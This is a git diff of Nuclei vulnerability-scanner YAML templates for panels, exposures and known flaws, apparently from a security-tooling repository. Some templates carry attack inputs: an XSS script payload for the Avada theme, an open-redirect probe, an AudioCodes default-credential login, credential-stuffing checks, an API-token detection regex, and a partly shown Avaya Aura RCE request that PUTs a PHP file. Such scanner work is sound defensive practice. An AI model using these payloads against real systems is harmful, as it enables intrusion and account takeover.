4a0a00473045022100b633553cbf3cb807efd84cb1fe68e4e2290ce6d99d22b72d8a5d479da998ab2602202fb7f481cf9d2cd5f9d23ba28a929aec8e9f27efc893350ed71167bd8c75688e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/asus-router-panel.yaml b/nuclei-templates/Other/asus-router-panel.yaml index cb715acc21..50dfe3aca4 100644 --- a/nuclei-templates/Other/asus-router-panel.yaml +++ b/nuclei-templates/Other/asus-router-panel.yaml @@ -7,14 +7,14 @@ info: description: Asus router login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true + max-request: 1 shodan-query: 'Server: httpd/2.0 port:8080' + verified: true tags: panel,asus,router,iot -requests: +http: - method: GET path: - "{{BaseURL}}/Main_Login.asp" @@ -30,5 +30,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/05 +# digest: 4a0a00473045022100f6b434b60dc9836ffb8ad6dc737740ac3dae892a6c1b2011c677ad36d518971602203e69a5a5f15b7f8db34d6885f7e6855faa46cac581126fdb7cbb92c9827145b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ASUSTOR-ADM-sqli.yaml b/nuclei-templates/Other/asustor-adm-sqli.yaml similarity index 100% rename from nuclei-templates/Other/ASUSTOR-ADM-sqli.yaml rename to nuclei-templates/Other/asustor-adm-sqli.yaml diff --git a/nuclei-templates/Other/asyncrat-c2.yaml b/nuclei-templates/Other/asyncrat-c2.yaml index bb63fea9dc..1a74e66eb5 100644 --- a/nuclei-templates/Other/asyncrat-c2.yaml +++ b/nuclei-templates/Other/asyncrat-c2.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: ssl:"AsyncRAT Server" censys-query: services.tls.certificates.leaf_data.issuer.common_name:AsyncRat - tags: c2,ir,osint,malware + tags: c2,ssl,tls,ir,osint,malware,asyncrat ssl: - address: "{{Host}}:{{Port}}" matchers: @@ -26,5 +26,4 @@ ssl: - type: json json: - " .issuer_cn" - -# digest: 4a0a004730450220262e30eae7a22898fce4027f0cb799b8a221f72dc8098b424b852dfff2e95ebc022100fad62d4f31cf375bde4762fde5912d964e68e604cb0f1beb61dbb71f5874bed3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c59847c783270837ebb9b2cebee01b561be5ea05cd2616a58b88b06a29504c080220279339a3be2b66697a10fbe80acc53ebafc888777a7f1975fc7194b72d78911e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/atechmedia-codebase-login-check.yaml b/nuclei-templates/Other/atechmedia-codebase-login-check.yaml index dca8671210..1783147d48 100644 --- a/nuclei-templates/Other/atechmedia-codebase-login-check.yaml +++ b/nuclei-templates/Other/atechmedia-codebase-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 2 - tags: login-check,atechmedia,codebase,creds-stuffing + tags: cloud,creds-stuffing,login-check,atechmedia,codebase self-contained: true @@ -52,4 +52,4 @@ http: - type: status status: - 302 -# digest: 4a0a0047304502203211e4c4a8ee586c921ef85318df427da89889286ef172f41e919af244cf9f29022100fdcdaafd216a411845f5a049a99435d301f1023257f461d33f360641023c2451:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b6260850c8884a11dfab10badc50eca9b785dc2db129f54b76e9605d49a30ebd0221009c6a4578217807fba1884a34be4e6e00b9d627a71fb62fd024876cee11219fe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ATHD-DVR-fileRead.yaml b/nuclei-templates/Other/athd-dvr-fileread.yaml similarity index 100% rename from nuclei-templates/Other/ATHD-DVR-fileRead.yaml rename to nuclei-templates/Other/athd-dvr-fileread.yaml diff --git a/nuclei-templates/Other/atlantis-detect.yaml b/nuclei-templates/Other/atlantis-detect.yaml index a80ac7315e..b8b0ab3df1 100644 --- a/nuclei-templates/Other/atlantis-detect.yaml +++ b/nuclei-templates/Other/atlantis-detect.yaml @@ -9,14 +9,17 @@ info: - https://github.com/runatlantis/atlantis classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:runatlantis:atlantis:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 1 + product: atlantis shodan-query: http.favicon.hash:-1706783005 - tags: panel,atlantis + vendor: runatlantis + verified: true + tags: panel,atlantis,runatlantis -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -33,5 +36,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/09 +# digest: 4a0a00473045022100f82fc01481176024c052e1e298f7cffd05aaf1868b51e2cf87b6e0d0b6799cba02200bb85fcae7ccbc15a106bdb1d32dfe806412d78574a92c3565b72a0eebf329ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/atlassian-api-token.yaml b/nuclei-templates/Other/atlassian-api-token.yaml index 7b9af43161..fcb73fa4c6 100644 --- a/nuclei-templates/Other/atlassian-api-token.yaml +++ b/nuclei-templates/Other/atlassian-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.yaml metadata: verified: true - tags: atlassian,file,token,api + tags: file,keys,atlassian,token,api file: - extensions: @@ -19,4 +19,5 @@ file: - type: regex part: body regex: - - (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) +# digest: 490a0046304402205433d3902cf7e3c7635bf23232f379b1aef00a5392fd97cd14771a114acd0a3902204babacddd38ce1156ad037e03c2f52b998acc6da7448013a7d6489edafd42644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/atlassian-bamboo-build.yaml b/nuclei-templates/Other/atlassian-bamboo-build.yaml index 015d5b8cca..6dd8512ad1 100644 --- a/nuclei-templates/Other/atlassian-bamboo-build.yaml +++ b/nuclei-templates/Other/atlassian-bamboo-build.yaml @@ -6,10 +6,11 @@ info: severity: unknown metadata: verified: true + max-request: 1 shodan-query: title:"Build Dashboard - Atlassian Bamboo" tags: misconfig,atlassian,bamboo -requests: +http: - method: GET path: - "{{BaseURL}}/allPlans.action" @@ -31,3 +32,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a0047304502200efd94247b76255574cc32b50365f1821d561bf7b226cc1430091fcf6ba61770022100cbc16a88c5a70b05497ec2551205be3cf455ed23a7cf4d0a083226d1c34e8857:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/atlassian-bamboo-panel.yaml b/nuclei-templates/Other/atlassian-bamboo-panel.yaml index 3faf916ca1..f09d8afd9b 100644 --- a/nuclei-templates/Other/atlassian-bamboo-panel.yaml +++ b/nuclei-templates/Other/atlassian-bamboo-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.atlassian.com/software/bamboo metadata: - verified: true max-request: 1 shodan-query: http.title:"Bamboo" + verified: true tags: panel,bamboo,login,detect http: @@ -41,4 +41,4 @@ http: regex: - 'version\s+([0-9A-Za-z\s\.]+)\s+-' - 'pvpVersion = "([a-z0-9.]+)";' -# digest: 4b0a00483046022100ece84998eb9793b9e2c73bac643c4cf195724becb28ccb35d37fad0066c4967b022100b75da45856fa8d90182181299882a1339a8ba78ccc81f4964c4754a16e3acf6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a964e7e553f1326fa41008524ff247a00a22f33e9f1dcebcafe996e8997d24d602210083a8c103431cac6bca37b6b353658618f0e3b3a61cf2996a975fa19b6070c6d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/atlassian-bamboo-setup-wizard.yaml b/nuclei-templates/Other/atlassian-bamboo-setup-wizard.yaml index 2b37258969..81ffbcf92d 100644 --- a/nuclei-templates/Other/atlassian-bamboo-setup-wizard.yaml +++ b/nuclei-templates/Other/atlassian-bamboo-setup-wizard.yaml @@ -4,12 +4,14 @@ info: name: Atlassian Bamboo Setup Wizard author: pussycat0x severity: info + description: Atlassian Bamboo is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true + max-request: 1 shodan-query: title:"Bamboo setup wizard" tags: misconfig,atlassian,bamboo,setup,installer -requests: +http: - method: GET path: - "{{BaseURL}}/setup/setupLicense.action" @@ -30,3 +32,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100a0a7c51e9771528342f49f71f03697f0c10adb7f1e3761e2fc6f9991b79b6098022100ac2f6cf82c9d9e98262befba3b97ca787883dd2d806b60fb9ccb3c19c88f8890:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/atlassian-crowd-panel-581.yaml b/nuclei-templates/Other/atlassian-crowd-panel-581.yaml new file mode 100644 index 0000000000..b7819bc20a --- /dev/null +++ b/nuclei-templates/Other/atlassian-crowd-panel-581.yaml @@ -0,0 +1,18 @@ +id: atlassian-crowd-panel + +info: + name: Atlassian Crowd panel detect + author: organiccrap + severity: info + tags: panel,atlassian + +requests: + - method: GET + path: + - '{{BaseURL}}/crowd/console/login.action' + + matchers: + - type: word + words: + - Atlassian Crowd - Login + part: body diff --git a/nuclei-templates/Other/atlassian-crowd-panel.yaml b/nuclei-templates/Other/atlassian-crowd-panel.yaml deleted file mode 100644 index 4fd18bcda4..0000000000 --- a/nuclei-templates/Other/atlassian-crowd-panel.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: atlassian-crowd-panel - -info: - name: Atlassian Crowd panel detect - author: organiccrap - severity: info - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/crowd/console/login.action' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - matchers: - - type: word - words: - - Atlassian Crowd - Login - part: body diff --git a/nuclei-templates/Other/atlassian-login-check.yaml b/nuclei-templates/Other/atlassian-login-check.yaml index d29e8ffc78..68d7d729cd 100644 --- a/nuclei-templates/Other/atlassian-login-check.yaml +++ b/nuclei-templates/Other/atlassian-login-check.yaml @@ -9,7 +9,7 @@ info: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: max-request: 1 - tags: login-check,atlassian,creds-stuffing + tags: cloud,creds-stuffing,login-check,atlassian self-contained: true @@ -41,5 +41,4 @@ http: - type: status status: - 403 - -# digest: 490a0046304402206f50cd5e1d38f5e8d581cf0327ea54c3e6d99e90b496555be87136c6358ea65702201b6d5dd42c50dd91d9ae55ed828d0029fed2053fc6a2d30fe99cc8a32eb591e5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210083c73505e66eaf278170bb782317370fa97a3e1415caebb9641f7632b44303c802207bda547ec71a5e97a812ea525a5f3f0217bd34d60c77ef3d1782c8da03c57192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/atom-sync-remote.yaml b/nuclei-templates/Other/atom-sync-remote.yaml index ed32916b4f..b8f4e67bd4 100644 --- a/nuclei-templates/Other/atom-sync-remote.yaml +++ b/nuclei-templates/Other/atom-sync-remote.yaml @@ -8,9 +8,10 @@ info: It discloses username and password created by remote-sync for Atom, contains FTP and/or SCP/SFTP/SSH server details and credentials metadata: verified: true + max-request: 1 tags: atom,exposure,config,files -requests: +http: - method: GET path: - "{{BaseURL}}/.remote-sync.json" @@ -39,3 +40,5 @@ requests: - type: status status: - 200 + +# digest: 490a0046304402203c2cdc6eb2e5ba53413df0c22072777c74efcfb1df85e2c762933675ab9fa19d0220297af89ee6df02e54dd45dac6fd1e7faa45e985077252ebac613860a3c7a2faf:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml b/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml index 27dc936559..3dbd07b8b7 100644 --- a/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml +++ b/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: low description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it. - reference: https://cxsecurity.com/issue/WLB-2020030185 + reference: + - https://cxsecurity.com/issue/WLB-2020030185 tags: wordpress,wp-theme,redirect requests: diff --git a/nuclei-templates/Other/attitude-wp-theme-open-redirect.yaml b/nuclei-templates/Other/attitude-wp-theme-open-redirect.yaml index b4071f7af7..d3a1f11f31 100644 --- a/nuclei-templates/Other/attitude-wp-theme-open-redirect.yaml +++ b/nuclei-templates/Other/attitude-wp-theme-open-redirect.yaml @@ -1,17 +1,14 @@ id: attitude-wp-theme-open-redirect - info: name: WordPress Attitude Themes 1.1.1 Open Redirection author: 0x_Akoko reference: https://cxsecurity.com/issue/WLB-2020030185 severity: low tags: wp,redirect - requests: - method: GET path: - "{{BaseURL}}/wp-content/themes/Attitude/go.php?https://example.com/" - matchers: - type: regex regex: diff --git a/nuclei-templates/Other/audiobookshelf-panel.yaml b/nuclei-templates/Other/audiobookshelf-panel.yaml index 1e98a02333..47a1227c37 100644 --- a/nuclei-templates/Other/audiobookshelf-panel.yaml +++ b/nuclei-templates/Other/audiobookshelf-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/advplyr/audiobookshelf metadata: - verified: true max-request: 2 shodan-query: title:"Audiobookshelf" + verified: true tags: panel,audiobookshelf,detect http: @@ -34,5 +34,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205c2b8c821545d360dea78b15558d6e1976d17b27b05796ced518f11dc6180363022060d87a8c9d7338a79e7d0cd96f19ce47412e803f78353038942a590db85bcdcd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022005d33f7b55e2318631d9a35582243793911cf44caa7570de0655afcb96b7c087022100d6627477aed96ce42ff3b817821d0634bc007f7e63aacb212eb9fefb95ec0367:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/audiocodes-default-login.yaml b/nuclei-templates/Other/audiocodes-default-login.yaml index b55bd57f3d..e6698c76ee 100644 --- a/nuclei-templates/Other/audiocodes-default-login.yaml +++ b/nuclei-templates/Other/audiocodes-default-login.yaml @@ -9,9 +9,11 @@ info: - https://wiki.freepbx.org/display/FPG/Supported+Devices-Audio+Codes#:~:text=Reset%20to%20Factory%20Defaults,-Press%20the%20Menu&text=Then%2C%20enter%20the%20Admin%20password,is%20%221234%22%20by%20default classification: cwe-id: CWE-798 + metadata: + max-request: 1 tags: iot,audiocodes,default-login -requests: +http: - raw: - | POST /login.cgi HTTP/1.1 @@ -26,8 +28,8 @@ requests: - admin password: - "1234" - unsafe: true + matchers-condition: and matchers: - type: word @@ -44,4 +46,4 @@ requests: status: - 200 -# Enhanced by md on 2023/01/06 +# digest: 490a00463044022054134961f9dae8e28f1a3ab15e2f4d54ab53cc99d2cd6f0ad84d409de02bd54102207d3ddda420249b278edca1d72b1ba7b373e5bb4b8df47724af9df2396caa2660:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/audiocodes-detect.yaml b/nuclei-templates/Other/audiocodes-detect.yaml index 7504ef3a9d..31fd950bd3 100644 --- a/nuclei-templates/Other/audiocodes-detect.yaml +++ b/nuclei-templates/Other/audiocodes-detect.yaml @@ -7,21 +7,20 @@ info: description: AudioCodes login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true + max-request: 1 shodan-query: http.html:"Audiocodes" + verified: true tags: panel,audiocodes -requests: +http: - method: GET path: - "{{BaseURL}}" matchers-condition: and matchers: - - type: word part: body words: @@ -32,5 +31,4 @@ requests: - type: status status: - 203 - -# Enhanced by md on 2022/10/31 +# digest: 4a0a00473045022100b29ce2ad2ced6c154ef7287f7e2bf74247ed12c973fa8700cc3aa184f51f822702204420ed6a24a68b3a48b62a0eae4318e0333e1706241a6566136ab8166318a615:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aura_utility_services.yaml b/nuclei-templates/Other/aura_utility_services.yaml new file mode 100644 index 0000000000..44c053f819 --- /dev/null +++ b/nuclei-templates/Other/aura_utility_services.yaml @@ -0,0 +1,20 @@ +id: aura_utility_services +info: + name: aura_utility_services + author: cn-kali-team + tags: detect,tech,aura_utility_services + severity: info + metadata: + product: aura_utility_services + shodan-query: + - html:"avaya aura" + vendor: avaya + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - avaya aura diff --git a/nuclei-templates/Other/auth-js.yaml b/nuclei-templates/Other/auth-js.yaml index 38ef687687..48efa55165 100644 --- a/nuclei-templates/Other/auth-js.yaml +++ b/nuclei-templates/Other/auth-js.yaml @@ -1,10 +1,8 @@ id: auth-js - info: name: auth.js author: geeknik severity: high - requests: - method: GET path: @@ -15,7 +13,6 @@ requests: - "{{BaseURL}}/src/auth.js" - "{{BaseURL}}/src/api/auth.js" - "{{BaseURL}}/web/api/auth.js" - matchers-condition: and matchers: - type: status diff --git a/nuclei-templates/Other/auth-json.yaml b/nuclei-templates/Other/auth-json.yaml index e9d1fdbd80..9813d621ef 100644 --- a/nuclei-templates/Other/auth-json.yaml +++ b/nuclei-templates/Other/auth-json.yaml @@ -4,6 +4,7 @@ info: name: Auth.json File - Disclosure author: DhiyaneshDk severity: high + description: auth.json file is exposed. metadata: verified: true max-request: 1 @@ -39,5 +40,4 @@ http: - '"consumer-key":' - '"consumer-secret":' condition: and - -# digest: 4a0a00473045022055f17fa3879ce3d236868b90db82221dbf48c1b9124dc9f97232b37bccdf57c40221009d503d8c3ecf87706e71ea7429852f3359f3a53cb35ffe0a866e922f1bf5eae3:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022041c4bb864ef31efd635294afb0d84a82586c421227bf8a3d42feed005d09501402204d7a803e2d35b37558df4a4c3466907bf3acd76c3a035c10ad04335b48d4b394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/authelia-panel.yaml b/nuclei-templates/Other/authelia-panel.yaml index 2ca8657997..fbdb95d748 100644 --- a/nuclei-templates/Other/authelia-panel.yaml +++ b/nuclei-templates/Other/authelia-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/authelia/authelia - https://www.authelia.com/ metadata: - verified: true max-request: 1 shodan-query: title:"Login - Authelia" + verified: true tags: login,panel,authelia http: @@ -29,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220490a5021967e030ff89ae16d4641c71e7eed70d1dd4ff6cd0f0194c789109b09022059bfbb46ae3a213be944bd8038a53d6fc66cd14351190788fbc8a035e9e6fbed:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008fd87b39284e84d585bb9f507cbcbbe83b8d7e6cdd73eb30ac8401c192cd19a2022061c03f9d86a08c9af5bb06582714b9d38aed4e8e104af2045c44c95392e0e73a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/auto-usb-install.yaml b/nuclei-templates/Other/auto-usb-install.yaml index 0f971fe501..1a5ac4e0d4 100644 --- a/nuclei-templates/Other/auto-usb-install.yaml +++ b/nuclei-templates/Other/auto-usb-install.yaml @@ -1,12 +1,16 @@ id: auto-usb-install info: - name: Auto USB Installation Enabled + name: Fortinet Auto USB Installation Enabled - Detect author: pussycat0x severity: info - description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port. + description: Via Fortinet Auto USB installation, an attacker with physical access to a FortiGate can load a new configuration or firmware using the USB port, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices - tags: fortigate,config,audit,firewall + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + tags: audit,config,file,firewall,fortigate file: - extensions: @@ -26,3 +30,4 @@ file: - "config router" - "config firewall" condition: or +# digest: 4a0a0047304502207705ba820df9f78c5d686bb2cf0a2945360c63e2774a2bd9984e2b676dfc3a71022100f9dc533ffa5f2fe96faee48a7249bf2982a55b89e7d5f40e7f49330d47dc5d2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/autobahn-python-detect-593.yaml b/nuclei-templates/Other/autobahn-python-detect-593.yaml deleted file mode 100644 index 7a9bc0b55d..0000000000 --- a/nuclei-templates/Other/autobahn-python-detect-593.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: autobahn-python-detect - -info: - name: Autobahn-Python Webserver Detect - author: pussycat0x - severity: info - metadata: - shodan-query: "AutobahnPython" - tags: tech,webserver - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: regex - regex: - - '

AutobahnPython([ 0-9.]+)<\/h1>' - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - regex: - - 'AutobahnPython([ 0-9.]+)' diff --git a/nuclei-templates/Other/autobahn-python-detect-594.yaml b/nuclei-templates/Other/autobahn-python-detect-594.yaml new file mode 100644 index 0000000000..3a6054cc5a --- /dev/null +++ b/nuclei-templates/Other/autobahn-python-detect-594.yaml @@ -0,0 +1,29 @@ +id: autobahn-python-detect + +info: + name: Autobahn-Python Webserver Detect + author: pussycat0x + severity: info + reference: https://www.shodan.io/search?query=%22AutobahnPython%22 + tags: tech,webserver + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: regex + regex: + - '

AutobahnPython([ 0-9.]+)<\/h1>' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'AutobahnPython([ 0-9.]+)' diff --git a/nuclei-templates/Other/automation-direct-596.yaml b/nuclei-templates/Other/automation-direct-597.yaml similarity index 100% rename from nuclei-templates/Other/automation-direct-596.yaml rename to nuclei-templates/Other/automation-direct-597.yaml diff --git a/nuclei-templates/Other/automatisch-panel.yaml b/nuclei-templates/Other/automatisch-panel.yaml index aa1ea97634..a9d888edee 100644 --- a/nuclei-templates/Other/automatisch-panel.yaml +++ b/nuclei-templates/Other/automatisch-panel.yaml @@ -10,9 +10,9 @@ info: - https://automatisch.io/ - https://github.com/automatisch/automatisch metadata: - verified: true max-request: 2 shodan-query: title:"Automatisch" + verified: true tags: panel,automatisch,detect http: @@ -32,5 +32,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f85f212b29469d97f61c4c2e2414bf38eeee56faf0acb325d485a83bb441097202200944819fa0dbd30f1490c609750d410dcadfc7dffac01b3a789515c2b25457a6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022035fe81f8489195b9067d4a0737e6e679ae53525803c06f578856012fdbdc1b100221008fd79bd81b27673d0a378a9f1cddf49f6c244e33a6087b2ee89cf09d85f71a4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/autoptimize.yaml b/nuclei-templates/Other/autoptimize.yaml index d7831e6f61..1426ac3ef2 100644 --- a/nuclei-templates/Other/autoptimize.yaml +++ b/nuclei-templates/Other/autoptimize.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/autoset-detect.yaml b/nuclei-templates/Other/autoset-detect.yaml index 1a0a536627..d3d2b8c6d6 100644 --- a/nuclei-templates/Other/autoset-detect.yaml +++ b/nuclei-templates/Other/autoset-detect.yaml @@ -7,9 +7,9 @@ info: reference: - http://autoset.net/xe/ metadata: - verified: true max-request: 1 shodan-query: title:"AutoSet" + verified: true tags: tech,php,autoset,apache http: @@ -36,4 +36,4 @@ http: group: 1 regex: - 'AutoSet (\d+(\.\d+)+)\b' -# digest: 490a0046304402205e24faf94cdcfc4943f6a3e61717745673990ed09e44dc9fa5cfdb2372d8912e02201a9c524f619681858711cdccb96931d8bb85bf7f03b9397d34c07b79576467e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008749f06172560522b858602a0ab2e051598a9f3730cb7dd05f1d5dffa07b0ffc022007b0555f10f4c2d96fd37b2ff258e1c9281c56f3550a0c62f8560e312618b290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/avada-xss.yaml b/nuclei-templates/Other/avada-xss.yaml index 803af86117..10c16dc9e1 100644 --- a/nuclei-templates/Other/avada-xss.yaml +++ b/nuclei-templates/Other/avada-xss.yaml @@ -12,9 +12,11 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + metadata: + max-request: 1 tags: xss,wp,wordpress,wp-theme,avada,wpscan -requests: +http: - method: GET path: - '{{BaseURL}}/forums/search/z-->%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/' @@ -37,4 +39,4 @@ requests: status: - 200 -# Enhanced by md on 2022/09/19 +# digest: 4a0a00473045022064e31c0913ff1bc4e65e1f027df44639e9b19502f2f41947a9b4179b2b804f410221009669c137a359fe327d566e6063ef49869c187c7849ea8eb6f47f7f44b98d3afb:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/avatier-password-management-604.yaml b/nuclei-templates/Other/avatier-password-management-604.yaml new file mode 100644 index 0000000000..f6295f4159 --- /dev/null +++ b/nuclei-templates/Other/avatier-password-management-604.yaml @@ -0,0 +1,20 @@ +--- +id: avatier-password-management + +info: + name: Avatier Password Management Self Service Portal + author: praetorian-thendrickson + severity: info + tags: panel,avatier + +requests: + - method: GET + path: + - '{{BaseURL}}/aims/ps/' + + matchers-condition: and + matchers: + - type: word + words: + - '<title id="PageTitle">Password Management Client' + - '"LabelWelcomeToPS"' \ No newline at end of file diff --git a/nuclei-templates/Other/avatier-password-management-605.yaml b/nuclei-templates/Other/avatier-password-management-605.yaml deleted file mode 100644 index 62d6395e8a..0000000000 --- a/nuclei-templates/Other/avatier-password-management-605.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: avatier-password-management - -info: - name: Avatier Password Management Panel Detect - author: praetorian-thendrickson - severity: info - description: An Avatier password management panel was detected. - reference: - - https://www.avatier.com - metadata: - shodan-query: http.favicon.hash:983734701 - tags: panel,avatier - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/aims/ps/' - - matchers-condition: and - matchers: - - type: word - words: - - 'LabelWelcomeToPS' - - 'Avatier Corporation' - condition: and - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/avaya-aura-rce.yaml b/nuclei-templates/Other/avaya-aura-rce.yaml index c42e577b60..576d10ebe4 100644 --- a/nuclei-templates/Other/avaya-aura-rce.yaml +++ b/nuclei-templates/Other/avaya-aura-rce.yaml @@ -4,15 +4,22 @@ info: name: Avaya Aura Utility Services Administration - Remote Code Execution author: DhiyaneshDk severity: critical + description: | + Avaya Aura Utility Services Administration is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. reference: - https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/ - https://download.avaya.com/css/public/documents/101076366 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-94 metadata: - verified: "true" + verified: true + max-request: 2 shodan-query: html:"Avaya Aura" - tags: rce,avaya,aura,iot + tags: rce,avaya,aura,iot,intrusive -requests: +http: - raw: - | PUT /PhoneBackup/{{randstr}}.php HTTP/1.1 @@ -20,8 +27,7 @@ requests: User-Agent: AVAYA Connection: close - System Manager ([a-z0-9.]+)

